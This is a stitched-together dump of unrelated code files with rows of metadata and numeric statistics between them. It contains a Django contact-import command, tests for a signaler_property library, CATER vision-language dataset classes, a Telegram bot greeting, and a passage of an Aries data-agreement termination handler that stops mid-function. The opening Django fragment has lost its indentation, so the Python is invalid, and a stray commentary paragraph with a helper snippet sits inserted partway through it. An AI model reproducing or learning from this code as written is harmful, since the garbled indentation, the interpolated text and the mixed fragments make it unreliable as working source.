settings.BASE_DIR,
'data/new_data/landline/0021_facility_landline_contacts_linked.json'
)
with open(file_path) as email_contacts:
email_data = json.load(email_contacts)
records = email_data[0].get('records')
mobile_type = ContactType.objects.get(name='LANDLINE')
for record in records:
contact = record.get('contact').get('contact')
contact, created = Contact.objects.get_or_create(
contact=contact,
contact_type=mobile_type
)
facility = record.get('facility').get('code')
            try:
                facility_obj = Facility.objects.get(code=facility)
                print(FacilityContact.objects.get_or_create(
                    contact=contact, facility=facility_obj,
                    created_by=system_user, updated_by=system_user))
            except Facility.DoesNotExist:
                print("The requested facility does not exist")
# facility mobile contacts
file_path = os.path.join(
settings.BASE_DIR,
'data/new_data/mobile/0024_facility_mobile_contacts.json'
)
with open(file_path) as email_contacts:
email_data = json.load(email_contacts)
records = email_data[0].get('records')
email_type = ContactType.objects.get(name='MOBILE')
for record in records:
            contact_value = record.get('contact')
            contact, created = Contact.objects.get_or_create(
                contact=contact_value,
                contact_type=email_type
            )
# facility mobile contacts linked
file_path = os.path.join(
settings.BASE_DIR,
'data/new_data/mobile/0025_facility_mobile_contacts_linked.json'
)
with open(file_path) as email_contacts:
email_data = json.load(email_contacts)
records = email_data[0].get('records')
mobile_type = ContactType.objects.get(name='MOBILE')
for record in records:
contact = record.get('contact').get('contact')
contact, created = Contact.objects.get_or_create(
contact=contact,
contact_type=mobile_type
)
facility = record.get('facility').get('code')
            try:
                facility_obj = Facility.objects.get(code=facility)
                print(FacilityContact.objects.get_or_create(
                    contact=contact, facility=facility_obj,
                    created_by=system_user, updated_by=system_user))
            except Facility.DoesNotExist:
                print("The requested facility does not exist")
# officers mobile contacts
file_path = os.path.join(
settings.BASE_DIR,
'data/new_data/mobile/0028_officer_mobile_contacts.json'
)
with open(file_path) as email_contacts:
email_data = json.load(email_contacts)
records = email_data[0].get('records')
email_type = ContactType.objects.get(name='MOBILE')
for record in records:
            contact_value = record.get('contact')
            contact, created = Contact.objects.get_or_create(
                contact=contact_value,
                contact_type=email_type
            )
# officer mobiles linked
file_path = os.path.join(
settings.BASE_DIR,
'data/new_data/mobile/0029_officer_mobile_contacts_linked.json'
)
with open(file_path) as email_contacts:
email_data = json.load(email_contacts)
records = email_data[0].get('records')
email_type = ContactType.objects.get(name='MOBILE')
for record in records:
contact = record.get('contact').get('contact')
contact, created = Contact.objects.get_or_create(
contact=contact,
contact_type=email_type
)
officer = record.get('officer')
if officer:
officer = officer.get('name')
                try:
                    officer_obj = Officer.objects.filter(name=officer)
                    print(OfficerContact.objects.get_or_create(
                        contact=contact, officer=officer_obj[0],
                        created_by=system_user, updated_by=system_user))
                except IndexError:
                    print("The requested officer does not exist")
            else:
                print("Officer key is missing")
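Each of the eight blocks in this command repeats the same load-and-link pattern, with only the JSON path and contact type changing; the per-record parsing could be factored out. A pure-Python sketch of that extraction step (no Django models involved; the helper name is hypothetical):

```python
def iter_contacts(anno, contact_type):
    """Yield (contact_string, contact_type) pairs from one loaded dump
    shaped like [{"records": [...]}].  Linked dumps nest the contact
    string one level deeper, under record["contact"]["contact"]."""
    for record in anno[0].get("records", []):
        raw = record.get("contact")
        if isinstance(raw, dict):  # linked-dump shape
            raw = raw.get("contact")
        if raw:
            yield raw, contact_type

demo = [{"records": [
    {"contact": "a@example.com"},               # plain dump shape
    {"contact": {"contact": "b@example.com"}},  # linked dump shape
]}]
pairs = list(iter_contacts(demo, "EMAIL"))
```

With the parsing centralised, each block reduces to one loop over `iter_contacts(...)` that calls `get_or_create` and links the result.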
| 42.845283 | 80 | 0.558305 | 1,156 | 11,354 | 5.269896 | 0.08391 | 0.057452 | 0.035456 | 0.053185 | 0.904793 | 0.904793 | 0.904793 | 0.904793 | 0.904793 | 0.904793 | 0 | 0.008553 | 0.361547 | 11,354 | 264 | 81 | 43.007576 | 0.831839 | 0.027744 | 0 | 0.771186 | 0 | 0 | 0.119536 | 0.062398 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.029661 | null | null | 0.059322 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
67a1befa89003e077bb5ecdc4da680eb9346c105 | 7,633 | py | Python | tests/test_signaler_property.py | justengel/event_signal | ea07bb6c79845e04f137dfb114952224fc617925 | [
"MIT"
] | 6 | 2018-08-14T03:51:06.000Z | 2022-03-05T06:09:19.000Z | tests/test_signaler_property.py | HashSplat/event_signal | ea07bb6c79845e04f137dfb114952224fc617925 | [
"MIT"
] | null | null | null | tests/test_signaler_property.py | HashSplat/event_signal | ea07bb6c79845e04f137dfb114952224fc617925 | [
"MIT"
] | 3 | 2018-08-06T15:39:33.000Z | 2020-02-10T21:38:57.000Z | from event_signal import signaler_property, signaler
def test_property():
class XTest(object):
def __init__(self, x=0):
self._x = x
@signaler_property
def x(self):
return self._x
@x.setter
def x(self, value):
self._x = value
@x.deleter
def x(self):
del self._x
t = XTest()
assert t.x == 0
t.x = 1
assert t.x == 1
del t.x
try:
t.x
raise AssertionError("Deleter failed")
except AttributeError:
pass
assert isinstance(XTest.x, property)
print("test_property passed!")
def test_no_setter():
class XTest(object):
def __init__(self, x=0):
self._x = x
self._before_val = None
self._post_val = None
@signaler_property
def x(self):
return self._x
t = XTest()
try:
t.x = 1
raise AssertionError("No setter was set. The cmd 't.x = 1' should have failed.")
except AttributeError:
pass
print("test_no_setter passed!")
def test_no_deleter():
class XTest(object):
def __init__(self, x=0):
self._x = x
self._before_val = None
self._post_val = None
@signaler_property
def x(self):
return self._x
@x.setter
def x(self, value):
self._x = value
@x.on("before_delete")
def x_deleting(self):
self._before_val = True
@x.on("delete")
def x_deleted(self):
self._post_val = True
t = XTest()
try:
del t.x
raise AssertionError("No deleter was set. The cmd 'del t.x' should have failed.")
except AttributeError:
pass
print("test_no_deleter passed!")
def test_change():
class XTest(object):
def __init__(self, x=0):
self._x = x
self._before_val = None
self._post_val = None
@signaler_property
def x(self):
return self._x
@x.setter
def x(self, value):
self._x = value
@x.on("before_change")
def x_changing(self, value):
self._before_val = value
@x.on("change")
def x_changed(self, value):
self._post_val = value
t = XTest()
assert t.x == 0
assert t._before_val is None
assert t._post_val is None
value = 1
t.x = value
assert t.x == value
assert t._before_val == value
assert t._post_val == value
existed = XTest.x.off(t, "change", t.x_changed)
assert existed
new_value = 2
t.x = new_value
assert t.x == new_value
assert t._before_val == new_value
assert t._post_val == value
existed = XTest.x.off(t, "before_change", t.x_changing)
assert existed
new_value2 = 3
t.x = new_value2
assert t.x == new_value2
assert t._before_val == new_value
assert t._post_val == value
XTest.x.off(t, "change")
existed = XTest.x.off(t, "change")
assert not existed
print("test_change passed!")
def test_delete():
class XTest(object):
def __init__(self, x=0):
self._x = x
self._before_val = None
self._post_val = None
@signaler_property
def x(self):
return self._x
@x.setter
def x(self, value):
self._x = value
@x.deleter
def x(self):
del self._x
@x.on("before_delete")
def x_deleting(self):
self._before_val = True
@x.on("delete")
def x_deleted(self):
self._post_val = True
t = XTest()
assert t.x == 0
assert t._before_val is None
assert t._post_val is None
del t.x
try:
t.x
raise AssertionError("t.x should not exist. The deleter failed.")
except AttributeError:
pass
    assert t._before_val is True
    assert t._post_val is True
t._x = 0
assert t.x == 0
XTest.x.off(t, "delete", t.x_deleted)
t._before_val = None
t._post_val = None
del t.x
try:
t.x
raise AssertionError("t.x should not exist. The deleter failed.")
except AttributeError:
pass
    assert t._before_val is True
assert t._post_val is None
t._x = 0
assert t.x == 0
XTest.x.off(t, "before_delete")
t._before_val = None
t._post_val = None
del t.x
try:
t.x
raise AssertionError("t.x should not exist. The deleter failed.")
except AttributeError:
pass
assert t._before_val is None
assert t._post_val is None
print("test_delete passed!")
def test_property_block_signal():
class XTest(object):
def __init__(self, x=0):
self._x = x
self._before_val = None
self._post_val = None
@signaler_property
def x(self):
return self._x
@x.setter
def x(self, value):
self._x = value
@x.on("before_change")
def x_changing(self, value):
self._before_val = value
@x.on("change")
def x_changed(self, value):
self._post_val = value
t = XTest()
assert t.x == 0
assert t._before_val is None
assert t._post_val is None
value = 1
t.x = value
assert t.x == value
assert t._before_val == value
assert t._post_val == value
XTest.x.block(t, "change", True)
new_value = 2
t.x = new_value
assert t.x == new_value
assert t._before_val == new_value
assert t._post_val == value
XTest.x.block(t, "change", False)
new_value2 = 3
t.x = new_value2
assert t.x == new_value2
assert t._before_val == new_value2
assert t._post_val == new_value2
XTest.x.block(t)
new_value3 = 4
t.x = new_value3
assert t.x == new_value3
assert t._before_val == new_value2
assert t._post_val == new_value2
XTest.x.block(t, block=False)
new_value4 = 5
t.x = new_value4
assert t.x == new_value4
assert t._before_val == new_value4
assert t._post_val == new_value4
print("test_property_block_signal passed!")
def test_signal_dot_property():
class XTest(object):
def __init__(self, x=0):
self._x = x
self._before_val = None
self._post_val = None
@signaler.property
def x(self):
return self._x
@x.setter
def x(self, value):
self._x = value
@x.on("before_change")
def x_changing(self, value):
self._before_val = value
@x.on("change")
def x_changed(self, value):
self._post_val = value
t = XTest()
assert t.x == 0
assert t._before_val is None
assert t._post_val is None
value = 1
t.x = value
assert t.x == value
assert t._before_val == value
assert t._post_val == value
XTest.x.off(t, "change", t.x_changed)
new_value = 2
t.x = new_value
assert t.x == new_value
assert t._before_val == new_value
assert t._post_val == value
XTest.x.off(t, "before_change", t.x_changing)
new_value2 = 3
t.x = new_value2
assert t.x == new_value2
assert t._before_val == new_value
assert t._post_val == value
print("test_signal_dot_property passed!")
if __name__ == '__main__':
test_property()
test_no_setter()
test_no_deleter()
test_change()
test_delete()
test_property_block_signal()
test_signal_dot_property()
print("All tests passed!")
| 21.87106 | 89 | 0.566881 | 1,070 | 7,633 | 3.773832 | 0.068224 | 0.095344 | 0.049529 | 0.071322 | 0.827142 | 0.818474 | 0.781327 | 0.781327 | 0.768202 | 0.732046 | 0 | 0.010214 | 0.333028 | 7,633 | 348 | 90 | 21.933908 | 0.78295 | 0 | 0 | 0.809524 | 0 | 0 | 0.081357 | 0.006551 | 0 | 0 | 0 | 0 | 0.238095 | 1 | 0.142857 | false | 0.051282 | 0.003663 | 0.025641 | 0.197802 | 0.029304 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
67dffaa9b9435043df4508e071dbbdb7a69e29f9 | 10,818 | py | Python | slot_language/object_slot/cater_data.py | Wuziyi616/slot_attention | ef9ddc9be1a29dc4a42dff5cdbed1dc308bc8230 | [
"Apache-2.0"
] | null | null | null | slot_language/object_slot/cater_data.py | Wuziyi616/slot_attention | ef9ddc9be1a29dc4a42dff5cdbed1dc308bc8230 | [
"Apache-2.0"
] | null | null | null | slot_language/object_slot/cater_data.py | Wuziyi616/slot_attention | ef9ddc9be1a29dc4a42dff5cdbed1dc308bc8230 | [
"Apache-2.0"
] | 1 | 2021-11-11T19:44:14.000Z | 2021-11-11T19:44:14.000Z | import os
import copy
import json
import numpy as np
from typing import Callable, List
from typing import Optional
from obj_data import ObjCLEVRVisionLanguageCLIPDataset, ObjCLEVRVisionLanguageCLIPDataModule, \
ObjAugCLEVRVisionLanguageCLIPDataset, ObjAugCLEVRVisionLanguageCLIPDataModule
class ObjCATERVisionLanguageCLIPDataset(ObjCLEVRVisionLanguageCLIPDataset):
def __init__(self,
data_root: str,
max_num_images: Optional[int],
clip_transforms: Callable,
tokenizer: str = 'clip',
max_n_objects: int = 10,
split: str = "train",
clip_len: int = 301,
prompt: str = 'a {color} {shape}',
is_video: bool = False,
shuffle_obj: bool = False,
pad_text: str = 'background'):
self.cater_subset = 'cater_cameramotion' if \
'cameramotion' in data_root else 'cater'
super().__init__(
data_root,
max_num_images,
clip_transforms,
tokenizer=tokenizer,
max_n_objects=max_n_objects,
split=split,
clip_len=clip_len,
prompt=prompt,
is_video=is_video,
shuffle_obj=shuffle_obj,
pad_text=pad_text)
def _generate_text(self, index: int):
"""Generate text descriptions of each object in the scene."""
img_idx = self._get_idx(index)[0]
anno = self.annos[img_idx]
colors = [obj['color'] for obj in anno['objects']]
shapes = [obj['shape'] for obj in anno['objects']]
sizes = [obj['size'] for obj in anno['objects']]
# e.g. 'a large red cone'
texts = [
self.prompt.format(size=size, color=color, shape=shape)
for size, color, shape in zip(sizes, colors, shapes)
]
# pad with some special texts, e.g. 'background'
texts = texts + [self.pad_text] * (self.text_num - len(texts))
# shuffle the order of objects
if self.split == 'train' and self.shuffle_obj:
np.random.shuffle(texts)
return texts
def get_files(self) -> List[str]:
"""Load the image (video) path and loaded annotations (lists)."""
self.data_path = os.path.join(self.data_root, "videos")
assert os.path.exists(
self.data_path), f"Path {self.data_path} does not exist"
with open(
os.path.join('./data/',
f'{self.cater_subset}_{self.split}_annos.json'),
'r') as f:
self.anno_paths = json.load(f)
self.anno_paths.sort()
img_paths, all_annos = [], []
for anno_name in self.anno_paths:
# stop once max_num_images samples have been collected
if self.max_num_images is not None and \
len(img_paths) >= self.max_num_images:
break
anno_path = os.path.join(self.data_root, 'scenes', anno_name)
with open(anno_path, 'r') as f:
anno = json.load(f)
img_name = anno['image_filename'].replace('CLEVR_new', 'CATER_new')
image_path = os.path.join(self.data_path, img_name)
assert os.path.exists(image_path), f"{image_path} does not exist"
img_paths.append(image_path)
all_annos.append(anno)
return img_paths, all_annos
class ObjCATERVisionLanguageCLIPDataModule(ObjCLEVRVisionLanguageCLIPDataModule
):
def __init__(self,
data_root: str,
train_batch_size: int,
val_batch_size: int,
clip_transforms: Callable,
num_workers: int,
tokenizer: str = 'clip',
max_n_objects: int = 10,
prompt: str = 'a {color} {shape}',
shuffle_obj: bool = False,
pad_text: str = 'background'):
super().__init__(
data_root,
train_batch_size,
val_batch_size,
clip_transforms,
num_workers,
tokenizer=tokenizer,
max_n_objects=max_n_objects,
prompt=prompt,
shuffle_obj=shuffle_obj,
pad_text=pad_text)
def _build_dataset(self):
self.train_dataset = ObjCATERVisionLanguageCLIPDataset(
data_root=self.data_root,
max_num_images=self.num_train_images,
clip_transforms=self.clip_transforms,
tokenizer=self.tokenizer,
max_n_objects=self.max_n_objects,
split='train',
prompt=self.prompt,
shuffle_obj=self.shuffle_obj,
pad_text=self.pad_text,
)
self.val_dataset = ObjCATERVisionLanguageCLIPDataset(
data_root=self.data_root,
max_num_images=self.num_val_images,
clip_transforms=self.val_clip_transforms,
tokenizer=self.tokenizer,
max_n_objects=self.max_n_objects,
split='val',
prompt=self.prompt,
shuffle_obj=self.shuffle_obj,
pad_text=self.pad_text,
)
class ObjAugCATERVisionLanguageCLIPDataset(ObjAugCLEVRVisionLanguageCLIPDataset
):
def __init__(self,
data_root: str,
max_num_images: Optional[int],
clip_transforms: Callable,
tokenizer: str = 'clip',
max_n_objects: int = 10,
split: str = "train",
clip_len: int = 301,
prompt: str = 'a {color} {shape}',
is_video: bool = False,
shuffle_obj: bool = False,
pad_text: str = 'background',
flip_img: bool = False):
self.cater_subset = 'cater_cameramotion' if \
'cameramotion' in data_root else 'cater'
super().__init__(
data_root,
max_num_images,
clip_transforms,
tokenizer=tokenizer,
max_n_objects=max_n_objects,
split=split,
clip_len=clip_len,
prompt=prompt,
is_video=is_video,
shuffle_obj=shuffle_obj,
pad_text=pad_text,
flip_img=flip_img)
def _generate_text(self, index: int):
"""Generate text descriptions of each object in the scene."""
img_idx = self._get_idx(index)[0]
anno = self.annos[img_idx]
colors = [obj['color'] for obj in anno['objects']]
shapes = [obj['shape'] for obj in anno['objects']]
sizes = [obj['size'] for obj in anno['objects']]
texts = [
self.prompt.format(size=size, color=color, shape=shape)
for size, color, shape in zip(sizes, colors, shapes)
]
# pad with some special texts, e.g. 'background'
# `True` in `obj_mask` stands for foreground objects
obj_mask = np.zeros(self.text_num, dtype=bool)
obj_mask[:len(texts)] = True
texts = texts + [self.pad_text] * (self.text_num - len(texts))
# shuffle the order of objects
shuffled_texts, idx, shuffled_obj_mask = None, None, None
if self.split == 'train':
idx = np.arange(len(texts))
if self.shuffle_obj:
np.random.shuffle(idx)
shuffled_texts = [texts[i] for i in idx]
else:
shuffled_texts = copy.deepcopy(texts)
shuffled_obj_mask = obj_mask[idx]
return texts, shuffled_texts, idx, obj_mask, shuffled_obj_mask
def get_files(self):
"""Load the image (video) paths and their annotations (returns two lists)."""
self.data_path = os.path.join(self.data_root, "videos")
assert os.path.exists(
self.data_path), f"Path {self.data_path} does not exist"
with open(
os.path.join('./data/',
f'{self.cater_subset}_{self.split}_annos.json'),
'r') as f:
self.anno_paths = json.load(f)
self.anno_paths.sort()
img_paths, all_annos = [], []
for anno_name in self.anno_paths:
# stop once max_num_images samples have been collected
if self.max_num_images is not None and \
len(img_paths) >= self.max_num_images:
break
anno_path = os.path.join(self.data_root, 'scenes', anno_name)
with open(anno_path, 'r') as f:
anno = json.load(f)
img_name = anno['image_filename'].replace('CLEVR_new', 'CATER_new')
image_path = os.path.join(self.data_path, img_name)
assert os.path.exists(image_path), f"{image_path} does not exist"
img_paths.append(image_path)
all_annos.append(anno)
return img_paths, all_annos
class ObjAugCATERVisionLanguageCLIPDataModule(
ObjAugCLEVRVisionLanguageCLIPDataModule):
def __init__(self,
data_root: str,
train_batch_size: int,
val_batch_size: int,
clip_transforms: Callable,
num_workers: int,
tokenizer: str = 'clip',
max_n_objects: int = 10,
prompt: str = 'a {color} {shape}',
shuffle_obj: bool = False,
pad_text: str = 'background',
flip_img: bool = False):
super().__init__(
data_root,
train_batch_size,
val_batch_size,
clip_transforms,
num_workers,
tokenizer=tokenizer,
max_n_objects=max_n_objects,
prompt=prompt,
shuffle_obj=shuffle_obj,
pad_text=pad_text,
flip_img=flip_img)
def _build_dataset(self):
self.train_dataset = ObjAugCATERVisionLanguageCLIPDataset(
data_root=self.data_root,
max_num_images=self.num_train_images,
clip_transforms=self.clip_transforms,
tokenizer=self.tokenizer,
max_n_objects=self.max_n_objects,
split='train',
prompt=self.prompt,
shuffle_obj=self.shuffle_obj,
pad_text=self.pad_text,
flip_img=self.flip_img,
)
self.val_dataset = ObjAugCATERVisionLanguageCLIPDataset(
data_root=self.data_root,
max_num_images=self.num_val_images,
clip_transforms=self.val_clip_transforms,
tokenizer=self.tokenizer,
max_n_objects=self.max_n_objects,
split='val',
prompt=self.prompt,
shuffle_obj=self.shuffle_obj,
pad_text=self.pad_text,
flip_img=self.flip_img,
)
| 38.913669 | 95 | 0.561656 | 1,210 | 10,818 | 4.744628 | 0.116529 | 0.030657 | 0.038321 | 0.02787 | 0.837833 | 0.837833 | 0.82773 | 0.819021 | 0.819021 | 0.818499 | 0 | 0.002263 | 0.34646 | 10,818 | 277 | 96 | 39.054152 | 0.80976 | 0.042429 | 0 | 0.846774 | 0 | 0 | 0.059808 | 0.008323 | 0 | 0 | 0 | 0 | 0.016129 | 1 | 0.040323 | false | 0 | 0.028226 | 0 | 0.100806 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
67fa96b225cb0205e1a37313062b3fbfa8b325e5 | 197 | py | Python | MUP_TG_BOT/src/controllers/start_message.py | DobroAlex/Simferopol_MUP_Telegram_Bot | a26d510178ed704690c497d599e0fc4d48b0deea | [
"MIT"
] | null | null | null | MUP_TG_BOT/src/controllers/start_message.py | DobroAlex/Simferopol_MUP_Telegram_Bot | a26d510178ed704690c497d599e0fc4d48b0deea | [
"MIT"
] | null | null | null | MUP_TG_BOT/src/controllers/start_message.py | DobroAlex/Simferopol_MUP_Telegram_Bot | a26d510178ed704690c497d599e0fc4d48b0deea | [
"MIT"
] | null | null | null | def start_message():
return 'Welcome to the bot. You can send your account number (6 digits) to retrieve current ' \
'information, or use "/register 6digits" to receive this information regularly.'
| 49.25 | 118 | 0.705584 | 27 | 197 | 5.111111 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013072 | 0.22335 | 197 | 3 | 119 | 65.666667 | 0.888889 | 0 | 0 | 0 | 0 | 0.333333 | 0.741117 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0 | 0.333333 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 8 |
db2c5858b4fa6fd3dd0c78f63aa8f7f6ed5b40e8 | 17,806 | py | Python | mydata_did/v1_0/handlers/data_agreement_termination_terminate_handler.py | decentralised-dataexchange/acapy-mydata-did-protocol | c84d86d12689cfb1a29d43734ee27a03ccdf8d77 | [
"Apache-2.0"
] | 1 | 2022-02-10T17:51:27.000Z | 2022-02-10T17:51:27.000Z | mydata_did/v1_0/handlers/data_agreement_termination_terminate_handler.py | decentralised-dataexchange/acapy-mydata-did-protocol | c84d86d12689cfb1a29d43734ee27a03ccdf8d77 | [
"Apache-2.0"
] | 12 | 2021-09-19T14:27:56.000Z | 2022-03-28T13:31:58.000Z | mydata_did/v1_0/handlers/data_agreement_termination_terminate_handler.py | decentralised-dataexchange/acapy-mydata-did-protocol | c84d86d12689cfb1a29d43734ee27a03ccdf8d77 | [
"Apache-2.0"
] | 1 | 2022-01-03T14:09:05.000Z | 2022-01-03T14:09:05.000Z | from aries_cloudagent.messaging.base_handler import BaseHandler, BaseResponder, RequestContext, HandlerException
from aries_cloudagent.storage.record import StorageRecord
from aries_cloudagent.wallet.base import BaseWallet
from aries_cloudagent.wallet.indy import IndyWallet
from ..messages.data_agreement_terminate import DataAgreementTerminationTerminateMessage
from ..messages.data_agreement_terminate_ack import DataAgreementTerminationAck
from ..manager import ADAManager
from ..models.data_agreement_termination_terminate_model import DataAgreementTerminationTerminateBody
from ..models.exchange_records.data_agreement_record import DataAgreementV1Record
from ..models.data_agreement_instance_model import DataAgreementInstance, DataAgreementInstanceSchema
from ..utils.did.mydata_did import DIDMyData
from ..utils.jsonld.data_agreement import verify_data_agreement
from ..messages.problem_report import (
DataAgreementTerminationProblemReport,
DataAgreementTerminationProblemReportReason
)
from ...patched_protocols.issue_credential.v1_0.models.credential_exchange import (
V10CredentialExchange
)
from ...patched_protocols.present_proof.v1_0.models.presentation_exchange import (
V10PresentationExchange
)
import json
import datetime
class DataAgreementTerminationTerminateMessageHandler(BaseHandler):
"""Handler for data-agreement-termination/1.0/terminate message."""
async def handle(self, context: RequestContext, responder: BaseResponder):
"""Message handler logic for data-agreement-termination/1.0/terminate message."""
# Assert that the message is of the correct type
assert isinstance(
context.message, DataAgreementTerminationTerminateMessage)
self._logger.info(
"Received data-agreement-termination/1.0/terminate message: \n%s",
json.dumps(context.message.serialize(), indent=4)
)
# Check if connection is ready
if not context.connection_ready:
self._logger.info(
"Connection not active, skipping data-agreement-termination/1.0/terminate handler: %s",
context.message_receipt.sender_did,
)
return
data_agreement_termination_terminate_message = context.message
data_agreement_termination_terminate_message_body: DataAgreementTerminationTerminateBody = data_agreement_termination_terminate_message.body
# Wallet instance from request context
wallet: IndyWallet = await context.inject(BaseWallet)
# Initialize ADA manager
ada_manager = ADAManager(context)
# Fetch the data agreement instance metadata
data_agreement_instance_metadata_records = await ada_manager.query_data_agreement_instance_metadata(
tag_query={
'data_agreement_id': data_agreement_termination_terminate_message_body.data_agreement_id,
}
)
# Check if there is a data agreement instance metadata record
if not data_agreement_instance_metadata_records:
self._logger.info(
"Data agreement not found; Failed to handle terminate message for data agreement: %s",
data_agreement_termination_terminate_message_body.data_agreement_id,
)
return
if len(data_agreement_instance_metadata_records) > 1:
self._logger.info(
"Duplicate data agreement records found; Failed to handle terminate message for data agreement: %s",
data_agreement_termination_terminate_message_body.data_agreement_id,
)
return
data_agreement_instance_metadata_record: StorageRecord = data_agreement_instance_metadata_records[
0]
# Identify the method of use
if data_agreement_instance_metadata_record.tags.get("method_of_use") == DataAgreementV1Record.METHOD_OF_USE_DATA_SOURCE:
# Fetch exchange record (credential exchange if method of use is "data-source")
tag_filter = {}
post_filter = {
"data_agreement_id": data_agreement_termination_terminate_message_body.data_agreement_id
}
records = await V10CredentialExchange.query(context, tag_filter, post_filter)
if not records:
self._logger.info(
"Credential exchange record not found; Failed to handle terminate message for data agreement: %s",
data_agreement_termination_terminate_message_body.data_agreement_id,
)
return
if len(records) > 1:
self._logger.info(
"Duplicate credential exchange records found; Failed to handle terminate message for data agreement: %s",
data_agreement_termination_terminate_message_body.data_agreement_id,
)
return
cred_ex_record: V10CredentialExchange = records[0]
# Check if data agreement is in "accept" status
if cred_ex_record.data_agreement_status != V10CredentialExchange.DATA_AGREEMENT_ACCEPT:
self._logger.info(
"Credential exchange record not in data agreement accept state; Failed to handle terminate message for data agreement: %s",
data_agreement_termination_terminate_message_body.data_agreement_id,
)
return
# Reconstruct the data agreement
# Deserialise data agreement
data_agreement_instance: DataAgreementInstance = DataAgreementInstanceSchema().load(
cred_ex_record.data_agreement
)
# Check if terminate message is signed by data agreement principle did
if data_agreement_instance.principle_did != data_agreement_termination_terminate_message_body.proof.verification_method:
self._logger.info(
"Data agreement principle DID does not match sender DID; Failed to handle terminate message for data agreement: %s",
data_agreement_termination_terminate_message_body.data_agreement_id,
)
# Send problem report.
problem_report = DataAgreementTerminationProblemReport(
from_did=data_agreement_termination_terminate_message.to_did,
to_did=data_agreement_termination_terminate_message.from_did,
created_time=str(
int(datetime.datetime.utcnow().timestamp())),
problem_code=DataAgreementTerminationProblemReportReason.PRINCIPLE_DID_INVALID.value,
explain=f"Data agreement principle DID does not match sender DID; Failed to process terminate message for data agreement: {data_agreement_termination_terminate_message.body.data_agreement_id}",
data_agreement_id=data_agreement_termination_terminate_message_body.data_agreement_id
)
problem_report.assign_thread_id(
thid=data_agreement_termination_terminate_message._id
)
# Update credential exchange record with data agreement metadata
cred_ex_record.data_agreement_problem_report = problem_report.serialize()
cred_ex_record.data_agreement_status = V10PresentationExchange.DATA_AGREEMENT_PROBLEM_REPORT
await cred_ex_record.save(context)
await responder.send_reply(problem_report)
return
# Update data agreement event with terminate event
data_agreement_instance.event.append(
data_agreement_termination_terminate_message_body.event
)
# Update data agreement proof chain with terminate proof
data_agreement_instance.proof_chain.append(
data_agreement_termination_terminate_message_body.proof
)
# Verify signatures on data agreement
verkeys = []
for event in data_agreement_instance.event:
temp_verkey = DIDMyData.from_did(event.did).public_key_b58
verkeys.append(temp_verkey)
valid = await verify_data_agreement(
data_agreement_instance.serialize(),
verkeys[-1],
wallet,
drop_proof_chain=False
)
if not valid:
self._logger.error(
"Data agreement terminate verification failed"
)
# Send problem report
problem_report = DataAgreementTerminationProblemReport(
from_did=data_agreement_termination_terminate_message.to_did,
to_did=data_agreement_termination_terminate_message.from_did,
created_time=str(
int(datetime.datetime.utcnow().timestamp())),
problem_code=DataAgreementTerminationProblemReportReason.SIGNATURE_VERIFICATION_FAILED.value,
explain=f"Data agreement terminate verification failed; Failed to process terminate message for data agreement: {data_agreement_termination_terminate_message.body.data_agreement_id}",
data_agreement_id=data_agreement_termination_terminate_message_body.data_agreement_id
)
problem_report.assign_thread_id(
thid=data_agreement_termination_terminate_message._id
)
# Update credential exchange record with data agreement metadata
cred_ex_record.data_agreement_problem_report = problem_report.serialize()
cred_ex_record.data_agreement_status = V10PresentationExchange.DATA_AGREEMENT_PROBLEM_REPORT
await cred_ex_record.save(context)
await responder.send_reply(problem_report)
raise HandlerException(
"Data agreement terminate signature verification failed"
)
# Update credential exchange record with data agreement metadata
cred_ex_record.data_agreement = data_agreement_instance.serialize()
cred_ex_record.data_agreement_status = V10CredentialExchange.DATA_AGREEMENT_TERMINATE
await cred_ex_record.save(context)
# Construct terminate ack message
data_agreement_terminate_ack = DataAgreementTerminationAck(
status="TERMINATE OK"
)
data_agreement_terminate_ack.assign_thread_id(
thid=data_agreement_termination_terminate_message._id
)
await responder.send_reply(data_agreement_terminate_ack)
if data_agreement_instance_metadata_record.tags.get("method_of_use") == DataAgreementV1Record.METHOD_OF_USE_DATA_USING_SERVICE:
# Fetch exchange record (presentation exchange if method of use is "data-using-service")
tag_filter = {}
post_filter = {
"data_agreement_id": data_agreement_termination_terminate_message_body.data_agreement_id
}
records = await V10PresentationExchange.query(context, tag_filter, post_filter)
if not records:
self._logger.info(
"Presentation exchange record not found; Failed to handle terminate message for data agreement: %s",
data_agreement_termination_terminate_message_body.data_agreement_id,
)
return
if len(records) > 1:
self._logger.info(
"Duplicate presentation exchange records found; Failed to handle terminate message for data agreement: %s",
data_agreement_termination_terminate_message_body.data_agreement_id,
)
return
pres_ex_record: V10PresentationExchange = records[0]
# Check if data agreement is in "accept" status
if pres_ex_record.data_agreement_status != V10PresentationExchange.DATA_AGREEMENT_ACCEPT:
self._logger.info(
"Presentation exchange record not in data agreement accept state; Failed to handle terminate message for data agreement: %s",
data_agreement_termination_terminate_message_body.data_agreement_id,
)
return
# Reconstruct the data agreement
# Deserialise data agreement
data_agreement_instance: DataAgreementInstance = DataAgreementInstanceSchema().load(
pres_ex_record.data_agreement
)
# Check if terminate message is signed by data agreement principle did
